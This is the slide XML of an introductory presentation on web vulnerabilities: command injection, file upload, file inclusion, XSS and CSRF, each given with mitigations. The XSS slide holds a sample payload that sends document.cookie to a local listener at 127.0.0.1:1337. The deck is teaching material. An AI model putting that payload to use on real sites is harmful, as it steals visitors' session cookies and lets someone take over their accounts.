            <a:pPr marL="142560" indent="-106920">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2305"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="431"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="ffffff"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>It occurs when an application passes user-supplied data to a system shell without proper validation, allowing attackers to run commands with the application's privileges. </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="ffffff"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="142560" indent="-106920">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2305"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="431"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="ffffff"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Unlike code injection, where attackers add their own code, command injection exploits the application's default functionality to execute system commands.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="ffffff"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="142560" indent="-106920">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2305"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="431"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="ffffff"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Mitigation:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="ffffff"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="285120" indent="-106920">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2305"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="431"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="ffffff"/>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFont typeface="Symbol"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Use parameterized queries when interacting with databases.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="ffffff"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="285120" indent="-106920">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2305"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="431"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="ffffff"/>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFont typeface="Symbol"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Validate and sanitize all user-supplied input.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="ffffff"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="285120" indent="-106920">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2305"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="431"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="ffffff"/>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFont typeface="Symbol"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Avoid running processes with elevated privileges whenever possible.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="44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File Upload Vulnerability</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="ffffff"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="135"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59000"/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="254880" indent="-1911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This occurs when a website allows users to upload files, but doesn’t properly check or validate the files being uploaded, such as images or documents.</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Attackers can exploit this by uploading malicious files like scripts or malware, which can then be executed on the server.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="ffffff"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="254880" indent="-1911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Mitigation:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="ffffff"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="764640" indent="-169920">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="720"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="ffffff"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" charset="2"/>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File type validation.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="ffffff"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="764640" indent="-169920">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="850"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="ffffff"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" charset="2"/>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Enforce size limits on uploaded files to prevent DOS attacks or server overload.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="ffffff"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="764640" indent="-169920">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="850"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="ffffff"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Restrict file permissions to prevent unauthorized access or execution of uploaded files. </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3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File Inclusion Vulnerability</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="ffffff"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="503640" y="1326240"/>
            <a:ext cx="9068760" cy="3285720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="t">
            <a:normAutofit fontScale="54000"/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="233280" indent="-174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This happens when a website includes a file from another location, but doesn’t properly validate the inclusion process.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="ffffff"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="233280" indent="-174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Attackers can exploit this by manipulating the file inclusion mechanism to execute their own mechanism malicious code, potentially gaining unauthorized access or control over the website.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="ffffff"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="233280" indent="-17496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Types: </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="ffffff"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="5" marL="699840" indent="-116640">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="283"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="ffffff"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Local File Inclusion (LFI) – same server</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="ffffff"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="5" marL="699840" indent="-116640">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="283"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="ffffff"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Remote File Inclusion (RFI) – a different website/server</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="ffffff"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="349920" indent="-116640">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="850"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="ffffff"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Mitigation: </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="ffffff"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="5" marL="699840" indent="-116640">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="283"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="ffffff"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Input validation.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="ffffff"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="5" marL="699840" indent="-116640">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="283"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="ffffff"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>File system restrictions.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3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400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Cross-Site Scripting (XSS)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="ffffff"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="139" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="503640" y="1143000"/>
            <a:ext cx="9068760" cy="4341960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="t">
            <a:normAutofit fontScale="58000"/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="250560" indent="-18792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This is when a malicious script is injected into a webpage, usually through a vulnerable input field. When another user visits that page, the script runs in their browser, potentially stealing cookies or session tokens, or performing other malicious actions.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="ffffff"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="250560" indent="-18792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Types: </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="ffffff"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="5" marL="751680" indent="-125280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="283"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="ffffff"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3200" spc="-1" strike="noStrike" u="dbl">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Stored XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> – </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Malicious script is is stored on the server and executed when other users access the affected page or resource.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="ffffff"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="5" marL="751680" indent="-125280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="283"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="ffffff"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3200" spc="-1" strike="noStrike" u="dbl">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Reflected XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> – </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Malicious script is injected into a web application, and the server reflects it back to the user’s browser, executing the script.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="ffffff"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="5" marL="751680" indent="-125280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="283"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="ffffff"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3200" spc="-1" strike="noStrike" u="dbl">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>DOM-based XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> – </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Malicious script is injected into the Document Object Model(DOM) of a webpage, and executed in the victim's browser, without involving the server.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="ffffff"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="250560" indent="-18792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highlight>
                  <a:srgbClr val="50200c"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>&lt;script&gt;window.location='http://127.0.0.1:1337/?cookie='+document.cookie&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="ffffff"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="250560" indent="-187920">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1417"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="ffffff"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Prevention: Input sanitization, Content Security Policy (CSP).</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="ffffff"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <mc:AlternateContent>
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="2000">
        <p:random/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback>
      <p:transition spd="slow">
        <p:random/>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0000"/>
            </a:gs>
            <a:gs pos="100000">
              <a:srgbClr val="2a6099"/>
            </a:gs>
          </a:gsLst>
          <a:lin ang="5400000"/>
        </a:gra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503640" y="225360"/>
            <a:ext cx="9068760" cy="943920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="432000" indent="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1417"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="4000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Cross-Site Request Forgery (CSRF)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="ffffff"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="141" name=""/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="759960" y="1143000"/>
            <a:ext cx="9068760" cy="1370520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="216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It occurs when a user is tricked into unknowingly executing actions on a website they’re logged into, without their consent.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="ffffff"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="-216000">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="431"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="ffffff"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>This can result in changing e-mail addresses or stealing money</a:t>
